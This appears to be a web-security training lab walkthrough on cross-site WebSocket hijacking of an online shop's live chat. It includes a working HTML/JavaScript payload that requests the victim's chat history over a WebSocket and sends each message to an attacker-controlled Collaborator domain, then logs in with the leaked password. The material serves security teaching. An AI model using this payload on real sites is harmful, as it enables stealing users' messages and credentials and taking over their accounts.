This online shop has a live chat feature implemented using WebSockets.
To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim's chat history, then use this gain access to their account.
Note
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server (burpcollaborator.net).
In Burp Proxy, in the WebSockets history tab, observe that the "READY" command retrieves past chat messages from the server.
In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens.
Right-click on the handshake request and select "Copy URL".
In your browser, go to the exploit server and paste the following template into the "Body" section:
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
websocket.send("READY");
}
function handleReply(event) {
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
}
</script>
Replace your-websocket-URL with the URL from the WebSocket handshake, and your-collaborator-domain with a payload generated by Burp Collaborator Client. Ensure you change the protocol in the WebSocket handshake URL from https:// to wss://.
Click "View exploit".
Poll for interactions using Burp Collaborator client. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator. You should also see that another user has visited your exploit page, and that their chat history contains their password.
Log in to the victim user's account.
Want to track your progress and have a more personalized learning experience? (It's free!)
